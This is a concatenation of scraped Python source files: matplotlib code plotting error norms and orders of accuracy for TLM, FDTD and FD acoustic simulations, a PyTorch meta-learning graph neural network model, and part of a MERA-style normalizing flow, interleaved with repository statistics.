plt.legend(('TLM', 'FDTD', '1st order', '2nd order'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{2}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
plt.ylim(10 ** -7, 10 ** -3)
plt.tight_layout()
ax = fig.add_subplot(122)
ax.loglog(h_th, (h_th / h_set[j]) ** 1 * max_norm_tlm[j], 'm--', lw=1)
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm_tlm[j], 'b-', lw=1)
ax.loglog(h_set, max_norm_tlm[:], 'rs',
markersize=7, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.loglog(h_set, max_norm_fdtd[:], 'go',
markersize=4, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{max}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
plt.ylim(10 ** -7, 10 ** -3)
plt.tight_layout()
res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
'results', 'case%i' % case, 'figures')
if not os.path.exists(res_path):
os.makedirs(res_path)
plt.savefig(os.path.join(res_path, 'errors_cfa2018.eps'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_cfa2018.png'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_cfa2018.pdf'), transparent=True,
bbox_inches='tight', pad_inches=0)
# =========================================================================
# Order of accuracy btw. 2 consecutive points
# =========================================================================
fig = plt.figure('Order of accuracy', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.semilogx(h_set[:-1], ord_acc_tlm_two[:], 'rs',
markersize=7, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_fdtd_two[:], 'go',
markersize=4, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
plt.legend(('TLM', 'FDTD'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
ax = fig.add_subplot(122)
ax.semilogx(h_set[:-1], ord_acc_tlm_max[:], 'rs',
markersize=7, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_fdtd_max[:], 'go',
markersize=4, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
# plt.legend(('TLM', 'FDTD'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
plt.tight_layout()
plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.eps'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.png'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.pdf'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.show()
def plot_errors_norms_fd_fdtd_tlm_cfa2018(h_set, one_norm_fd,
one_norm_tlm, one_norm_fdtd,
two_norm_fd, two_norm_tlm, two_norm_fdtd,
max_norm_fd, max_norm_tlm, max_norm_fdtd,
ord_acc_fd_one, ord_acc_tlm_one, ord_acc_fdtd_one,
ord_acc_fd_two, ord_acc_tlm_two, ord_acc_fdtd_two,
ord_acc_fd_max, ord_acc_tlm_max, ord_acc_fdtd_max, case):
"""
Main plot made of 3 subplots that show (1) the avaraged error,
(2) the two-norm of the error and (3) the max-norm of the error.
cfa2018: show two- and max-norms only.
:param h_set: spatial step sequence (m).
:type h_set: list of floats
:param avg_error_tlm: error averaged over all receivers for the TLM for
each spatial step.
:type avg_error_tlm: 1d-array
:param avg_error_fdtd: error averaged over all receivers for the FDTD for
each spatial step.
:type avg_error_fdtd: 1d-array
:param two_norm_tlm: relative error in the 2-norm for the TLM for
each spatial step.
:type two_norm_tlm: 1d-array
:param two_norm_fdtd: relative error in the 2-norm for the FDTD for
each spatial step.
:type two_norm_fdtd: 1d-array
:param max_norm_tlm: relative error in the MAX-norm for the TLM for
each spatial step.
:type max_norm_tlm: 1d-array
:param max_norm_fdtd: relative error in the MAX-norm for the FDTD for
each spatial step.
:type max_norm_fdtd: 1d-array
:param ord_acc_tlm_two: order of accuracy between two consecutive grids in
the 2-norm for the TLM.
:type ord_acc_tlm_two: 1d-array
:param ord_acc_fdtd_two: order of accuracy between two consecutive grids in
the 2-norm for the FDTD.
:type ord_acc_fdtd_two: 1d-array
:param ord_acc_tlm_max: order of accuracy between two consecutive grids in
the max-norm for the TLM.
:type ord_acc_tlm_max: 1d-array
:param ord_acc_fdtd_max: order of accuracy between two consecutive grids in
the max-norm for the FDTD.
:type ord_acc_fdtd_max: 1d-array
:param case: integer that sorts of the saved folders in the results
directory.
:type case: int
:return: two graphs, first the errors and norms, second the order of
accuracy for each norm.
"""
print 'Plotting the errors'
h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
j = 1
fig = plt.figure('Errors', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.loglog(h_set, two_norm_fd[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
ax.loglog(h_set, two_norm_fdtd[:], 'go',
markersize=5, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.loglog(h_set, two_norm_tlm[:], 'rs',
markersize=5, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.loglog(h_th, (h_th / h_set[j]) ** 1 * two_norm_tlm[j], 'm--', lw=1)
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm_tlm[j], 'b-', lw=1)
plt.legend(('FD', 'FDTD', 'TLM', '1st order', '2nd order'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{2}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
plt.ylim(10 ** -8, 10 ** -0)
plt.tight_layout()
ax = fig.add_subplot(122)
ax.loglog(h_th, (h_th / h_set[j]) ** 1 * max_norm_tlm[j], 'm--', lw=1)
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm_tlm[j], 'b-', lw=1)
ax.loglog(h_set, max_norm_fd[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
ax.loglog(h_set, max_norm_fdtd[:], 'go',
markersize=5, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.loglog(h_set, max_norm_tlm[:], 'rs',
markersize=5, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{max}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
plt.ylim(10 ** -8, 10 ** -0)
plt.tight_layout()
res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
'results', 'case%i' % case, 'figures')
if not os.path.exists(res_path):
os.makedirs(res_path)
plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.eps'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.png'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.pdf'), transparent=True,
bbox_inches='tight', pad_inches=0)
# =========================================================================
# Order of accuracy btw. 2 consecutive points
# =========================================================================
fig = plt.figure('Order of accuracy', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.semilogx(h_set[:-1], ord_acc_fd_two[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_fdtd_two[:], 'go',
markersize=5, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_tlm_two[:], 'rs',
markersize=5, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
plt.legend(('FD', 'FDTD', 'TLM'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
ax = fig.add_subplot(122)
ax.semilogx(h_set[:-1], ord_acc_fd_max[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_fdtd_max[:], 'go',
markersize=5, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.semilogx(h_set[:-1], ord_acc_tlm_max[:], 'rs',
markersize=5, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
# plt.legend(('TLM', 'FDTD'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
plt.tight_layout()
plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.eps'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.png'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.pdf'), transparent=True,
bbox_inches='tight', pad_inches=0)
plt.show()
| 45.70852
| 91
| 0.599676
| 2,939
| 20,386
| 3.971759
| 0.073835
| 0.023987
| 0.03084
| 0.024672
| 0.917502
| 0.909706
| 0.902853
| 0.892487
| 0.883834
| 0.88332
| 0
| 0.036713
| 0.226381
| 20,386
| 445
| 92
| 45.811236
| 0.703443
| 0.070441
| 0
| 0.768116
| 0
| 0
| 0.095558
| 0.013451
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014493
| null | null | 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b841d52fe963876d5c64011fde9056d333ec0db8
| 16,330
|
py
|
Python
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 4
|
2021-05-07T02:21:26.000Z
|
2021-08-04T14:25:38.000Z
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 1
|
2021-05-24T07:42:00.000Z
|
2022-01-18T04:24:49.000Z
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 2
|
2021-05-01T09:36:01.000Z
|
2021-11-16T04:11:06.000Z
|
import torch
import numpy as np
from torch import nn
from torch.nn import functional as F
from torch import optim
from learner_1 import Learner_1
from learner_2 import Learner_2
from sklearn import metrics
from chemical import Chemical
from scaling_sgc import Scaling
from translation_sgc import Translation
import math
class Meta_MSNA(nn.Module):
def __init__(self, config, config_chemi, config_scal, config_trans, args, num_attri, label_dim):
super(Meta_MSNA, self).__init__()
self.task_lr = args.task_lr
self.meta_lr = args.meta_lr
self.label_dim = label_dim
self.hidden = args.hidden
self.query_weight = nn.ParameterList()
query_weight_0 = nn.Parameter(torch.FloatTensor(self.hidden, self.hidden))
query_weight_1 = nn.Parameter(torch.FloatTensor(label_dim, label_dim))
stdv_0 = 1. / math.sqrt(self.hidden)
stdv_1 = 1. / math.sqrt(label_dim)
query_weight_0.data.uniform_(-stdv_0, stdv_0)
query_weight_1.data.uniform_(-stdv_1, stdv_1)
self.query_weight.append(query_weight_0)
self.query_weight.append(query_weight_1)
self.net = Learner_1(config)
self.chemical = Chemical(config_chemi)
self.scaling = Scaling(config_scal, args, num_attri, label_dim)
self.translation = Translation(config_trans, args, num_attri, label_dim)
self.meta_optim = optim.Adam([{'params': self.net.parameters()}, {'params': self.chemical.parameters()},
{'params': self.scaling.parameters()}, {'params': self.translation.parameters()},
{'params': self.query_weight}], lr=self.meta_lr)
self.dataset = args.dataset
def forward(self, x_spt, y_spt, x_qry, y_qry, idx_spt_list, idx_qry_list, features_list, neighs_list,
l2_coef, Lab, update_step, batch_size, training):
training = training
task_num = len(x_spt)
update_step = update_step
Losses_q = [0 for _ in range(update_step + 1)]
accs = 0
all_predictions = []
all_predictions_f = []
all_trues = []
all_trues_f = []
for j in range(int(task_num / batch_size) if task_num % batch_size == 0 else int(task_num / batch_size) + 1):
start_idx = j * batch_size
end_idx = min(start_idx + batch_size, task_num)
losses_q = [0 for _ in range(update_step + 1)]
for i in range(start_idx, end_idx):
# print("neighs_list[i]:", neighs_list[i])
logits_1, logits_2 = self.net(features_list[i], neighs_list[i])
instant_1 = torch.relu(torch.mm(torch.mean(logits_1, dim=0, keepdim=True), self.query_weight[0]))
inside_sigmoid_1 = torch.mm(logits_1, instant_1.T)
att_weight_1 = torch.sigmoid(inside_sigmoid_1)
graph_signal_1 = torch.sum(att_weight_1 * logits_1, dim=0)
instant_2 = torch.relu(torch.mm(torch.mean(logits_2, dim=0, keepdim=True), self.query_weight[1]))
inside_sigmoid_2 = torch.mm(logits_2, instant_2.T)
att_weight_2 = torch.sigmoid(inside_sigmoid_2)
graph_signal_2 = torch.sum(att_weight_2 * logits_2, dim=0)
chemical = torch.cat((graph_signal_1, graph_signal_2), dim=0)
chemical = self.chemical(chemical)
scaling = self.scaling(chemical)
translation = self.translation(chemical)
adapted_prior = []
for s in range(len(scaling)):
adapted_prior.append(torch.mul(self.net.parameters()[s], (scaling[s] + 1)) + translation[s])
logits_1, logits_2 = self.net(features_list[i], neighs_list[i], adapted_prior)
logit_spt = logits_2[idx_spt_list[i]]
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss = torch.nn.BCEWithLogitsLoss()
loss = loss(logit_spt, y_spt[i])
else:
loss = torch.nn.functional.cross_entropy(logit_spt, y_spt[i])
grad = torch.autograd.grad(loss, adapted_prior)
fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, adapted_prior)))
if update_step == 1:
logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
logits_q = logits_2[idx_qry_list[i]]
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss_q = torch.nn.BCEWithLogitsLoss()
loss_q = loss_q(logits_q, y_qry[i])
else:
loss_q = F.cross_entropy(logits_q, y_qry[i])
l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
l2_loss = l2_loss * l2_coef
losses_q[1] += (loss_q + l2_loss)
Losses_q[1] += (loss_q + l2_loss)
else:
for k in range(1, update_step):
logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
logit_spt = logits_2[idx_spt_list[i]]
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss = torch.nn.BCEWithLogitsLoss()
loss = loss(logit_spt, y_spt[i])
else:
loss = F.cross_entropy(logit_spt, y_spt[i])
grad = torch.autograd.grad(loss, fast_weights)
fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, fast_weights)))
if k == update_step - 1:
logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
logits_q = logits_2[idx_qry_list[i]]
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss_q = torch.nn.BCEWithLogitsLoss()
loss_q = loss_q(logits_q, y_qry[i])
else:
loss_q = F.cross_entropy(logits_q, y_qry[i])
l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
l2_loss = l2_loss * l2_coef
losses_q[k + 1] += (loss_q + l2_loss)
Losses_q[k + 1] += (loss_q + l2_loss)
with torch.no_grad():
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
pred_q = torch.sigmoid(logits_q)
pred_q = torch.round(pred_q)
y_true = []
y_pred = []
for m in range(len(y_qry[i])):
for n in range(self.label_dim):
y_true.append((y_qry[i])[m, n].cpu())
for m in range(len(pred_q)):
for n in range(self.label_dim):
y_pred.append(pred_q[m, n].cpu())
else:
pred_q = F.softmax(logits_q, dim=1).argmax(dim=1)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
all_trues.append(y_true)
all_predictions.append(y_pred)
all_trues_f.append((y_qry[i].cpu()).numpy())
all_predictions_f.append((pred_q.cpu()).numpy())
else:
all_trues.append((y_qry[i].cpu()).numpy())
all_predictions.append((pred_q.cpu()).numpy())
loss_q = losses_q[-1] / batch_size
if training == True:
self.meta_optim.zero_grad()
loss_q.backward()
self.meta_optim.step()
all_trues = np.concatenate(all_trues)
all_predictions = np.concatenate(all_predictions)
acc = metrics.accuracy_score(all_trues, all_predictions, normalize=True)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
all_trues_f = np.concatenate(all_trues_f)
all_predictions_f = np.concatenate(all_predictions_f)
MiF1s = metrics.f1_score(all_trues_f, all_predictions_f, labels=Lab,
average='micro')
else:
MiF1s = metrics.f1_score(all_trues, all_predictions, labels=Lab, average='micro')
Loss_q = Losses_q[-1] / task_num
return acc, Loss_q, MiF1s
class Meta_NA(nn.Module):
def __init__(self, config, config_chemi, config_scal, config_trans, args, num_attri, label_dim):
super(Meta_NA, self).__init__()
self.task_lr = args.task_lr
self.meta_lr = args.meta_lr
self.label_dim = label_dim
self.query_weight = nn.ParameterList()
query_weight_1 = nn.Parameter(torch.FloatTensor(label_dim, 1))
stdv = 1. / math.sqrt(label_dim)
query_weight_1.data.uniform_(-stdv, stdv)
self.query_weight.append(query_weight_1)
self.net = Learner_2(config)
self.chemical = Chemical(config_chemi)
self.scaling = Scaling(config_scal, args, num_attri, label_dim)
self.translation = Translation(config_trans, args, num_attri, label_dim)
self.meta_optim = optim.Adam([{'params': self.net.parameters()}, {'params': self.chemical.parameters()},
{'params': self.scaling.parameters()}, {'params': self.translation.parameters()}],
lr=self.meta_lr)
self.dataset = args.dataset
def forward(self, x_spt, y_spt, x_qry, y_qry, idx_spt_list, idx_qry_list, features_list, neighs_list,
l2_coef, Lab, update_step, batch_size, training):
training = training
task_num = len(x_spt)
all_predictions = []
all_predictions_f = []
all_trues = []
all_trues_f = []
Losses_q = [0 for _ in range(update_step + 1)]
for j in range(int(task_num / batch_size) if task_num % batch_size == 0 else int(task_num / batch_size) + 1):
start_idx = j * batch_size
end_idx = min(start_idx + batch_size, task_num)
losses_q = [0 for _ in range(update_step + 1)]
for i in range(start_idx, end_idx):
logits_2 = self.net(features_list[i])
att_weight_2 = F.softmax(torch.mm(logits_2, self.query_weight[0]), dim=0)
graph_signal_2 = torch.sum(att_weight_2 * logits_2, dim=0)
chemical = self.chemical(graph_signal_2)
scaling = self.scaling(chemical)
translation = self.translation(chemical)
adapted_prior = []
for s in range(len(scaling)):
adapted_prior.append(torch.mul(self.net.parameters()[s], (scaling[s] + 1)) + translation[s])
logits = self.net(x_spt[i], adapted_prior)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss = torch.nn.BCEWithLogitsLoss()
loss = loss(logits, y_spt[i])
else:
loss = torch.nn.functional.cross_entropy(logits, y_spt[i])
grad = torch.autograd.grad(loss, adapted_prior)
fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, adapted_prior)))
if update_step == 1:
logits_q = self.net(x_qry[i], fast_weights)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss_q = torch.nn.BCEWithLogitsLoss()
loss_q = loss_q(logits_q, y_qry[i])
else:
loss_q = F.cross_entropy(logits_q, y_qry[i])
l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
l2_loss = l2_loss * l2_coef
losses_q[1] += (loss_q + l2_loss)
Losses_q[1] += (loss_q + l2_loss)
else:
for k in range(1, update_step):
logits = self.net(x_spt[i], fast_weights)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss = torch.nn.BCEWithLogitsLoss()
loss = loss(logits, y_spt[i])
else:
loss = F.cross_entropy(logits, y_spt[i])
grad = torch.autograd.grad(loss, fast_weights)
fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, fast_weights)))
if k == update_step - 1:
logits_q = self.net(x_qry[i], fast_weights)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
loss_q = torch.nn.BCEWithLogitsLoss()
loss_q = loss_q(logits_q, y_qry[i])
else:
loss_q = F.cross_entropy(logits_q, y_qry[i])
l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
l2_loss = l2_loss * l2_coef
losses_q[k + 1] += (loss_q + l2_loss)
Losses_q[k + 1] += (loss_q + l2_loss)
with torch.no_grad():
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
pred_q = torch.sigmoid(logits_q)
pred_q = torch.round(pred_q)
y_true = []
y_pred = []
for m in range(len(y_qry[i])):
for n in range(self.label_dim):
y_true.append((y_qry[i])[m, n].cpu())
for m in range(len(pred_q)):
for n in range(self.label_dim):
y_pred.append(pred_q[m, n].cpu())
else:
pred_q = F.softmax(logits_q, dim=1).argmax(dim=1)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
all_trues.append(y_true)
all_predictions.append(y_pred)
all_trues_f.append((y_qry[i].cpu()).numpy())
all_predictions_f.append((pred_q.cpu()).numpy())
else:
all_trues.append((y_qry[i].cpu()).numpy())
all_predictions.append((pred_q.cpu()).numpy())
loss_q = losses_q[-1] / batch_size
if training == True:
self.meta_optim.zero_grad()
loss_q.backward()
self.meta_optim.step()
all_trues = np.concatenate(all_trues)
all_predictions = np.concatenate(all_predictions)
acc = metrics.accuracy_score(all_trues, all_predictions, normalize=True)
if self.dataset in ['Cuneiform', 'Sub_Yelp']:
all_trues_f = np.concatenate(all_trues_f)
all_predictions_f = np.concatenate(all_predictions_f)
MiF1s = metrics.f1_score(all_trues_f, all_predictions_f, labels=Lab,
average='micro')
else:
MiF1s = metrics.f1_score(all_trues, all_predictions, labels=Lab, average='micro')
Loss_q = Losses_q[-1] / task_num
return acc, Loss_q, MiF1s
| 53.717105
| 121
| 0.5218
| 1,985
| 16,330
| 4.012091
| 0.077078
| 0.02009
| 0.010045
| 0.026369
| 0.895907
| 0.893898
| 0.876946
| 0.842793
| 0.842541
| 0.827097
| 0
| 0.015948
| 0.374097
| 16,330
| 303
| 122
| 53.894389
| 0.763233
| 0.002449
| 0
| 0.800725
| 0
| 0
| 0.019518
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.072464
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b87a51b4ac52ce3865112844b856b1a76420df63
| 21,572
|
py
|
Python
|
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 28
|
2021-01-27T00:41:40.000Z
|
2022-02-14T10:11:51.000Z
|
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | null | null | null |
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 6
|
2021-02-03T01:42:08.000Z
|
2021-12-03T17:47:19.000Z
|
import math, torch
from utils import getIndeices
from flow import Flow
import source, utils
class OneToTwoMERA(Flow):
def __init__(self, length, layerList, meanNNlist=None, scaleNNlist=None, repeat=1, depth=None, nMixing=5, decimal=None, rounding=None, name="OneToTwoMERA"):
kernelSize = 2
if depth is None or depth == -1:
depth = int(math.log(length, kernelSize))
if meanNNlist is None or scaleNNlist is None:
prior = source.SimpleHierarchyPrior(length, nMixing, decimal, rounding)
else:
lastPrior = source.MixtureDiscreteLogistic([3, 1, 4], nMixing, decimal, rounding)
prior = source.PassiveHierarchyPrior(length, lastPrior, decimal=decimal, rounding=rounding)
super(OneToTwoMERA, self).__init__(prior, name)
self.decimal = decimal
self.rounding = rounding
self.repeat = repeat
self.depth = depth
layerList = layerList * depth
self.layerList = torch.nn.ModuleList(layerList)
if meanNNlist is not None and scaleNNlist is not None:
meanNNlist = meanNNlist * depth
scaleNNlist = scaleNNlist * depth
self.meanNNlist = torch.nn.ModuleList(meanNNlist)
self.scaleNNlist = torch.nn.ModuleList(scaleNNlist)
else:
self.meanNNlist = None
self.scaleNNlist = None
def inverse(self, x):
depth = self.depth
self.meanList = []
self.scaleList = []
UR = []
DL = []
DR = []
ul = x
for no in range(depth):
ul = ul.permute([0, 2, 1, 3]).reshape(ul.shape[0] * ul.shape[2], ul.shape[1], ul.shape[3])
for _ in range(2):
_x = ul.reshape(*ul.shape[:-1], ul.shape[-1] // 2, 2)
upper = _x[:, :, :, 0].contiguous()
down = _x[:, :, :, 1].contiguous()
for i in range(2 * self.repeat):
if i % 2 == 0:
tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(upper)) * self.decimal.scaling)
down = down - tmp
else:
tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(down)) * self.decimal.scaling)
upper = upper + tmp
upper = upper.reshape(*upper.shape, 1)
down = down.reshape(*down.shape, 1)
ul = torch.cat([upper, down], -1).reshape(*ul.shape)
ul = ul.reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 3, 2, 1]).reshape(*ul.shape)
ul = ul.reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 2, 1, 3])
_x = im2grp(ul)
ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
if self.meanNNlist is not None and self.scaleNNlist is not None and no != depth - 1:
self.meanList.append(reform(self.meanNNlist[no](self.decimal.inverse_(ul))).contiguous())
self.scaleList.append(reform(self.scaleNNlist[no](self.decimal.inverse_(ul))).contiguous())
UR.append(ur)
DL.append(dl)
DR.append(dr)
for no in reversed(range(depth)):
ur = UR[no].reshape(*ul.shape, 1)
dl = DL[no].reshape(*ul.shape, 1)
dr = DR[no].reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
return ul, ul.new_zeros(ul.shape[0])
def forward(self, z):
depth = self.depth
ul = z
UR = []
DL = []
DR = []
for no in range(depth):
_x = im2grp(ul)
ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
UR.append(ur)
DL.append(dl)
DR.append(dr)
for no in reversed(range(depth)):
ur = UR[no]
dl = DL[no]
dr = DR[no]
ur = ur.reshape(*ul.shape, 1)
dl = dl.reshape(*ul.shape, 1)
dr = dr.reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
for _ in range(2):
ul = ul.permute([0, 3, 1, 2]).reshape(ul.shape[0] * ul.shape[3], ul.shape[1], ul.shape[2])
_x = ul.reshape(*ul.shape[:-1], ul.shape[-1] // 2, 2)
upper = _x[:, :, :, 0].contiguous()
down = _x[:, :, :, 1].contiguous()
for i in reversed(range(2 * self.repeat)):
if i % 2 == 0:
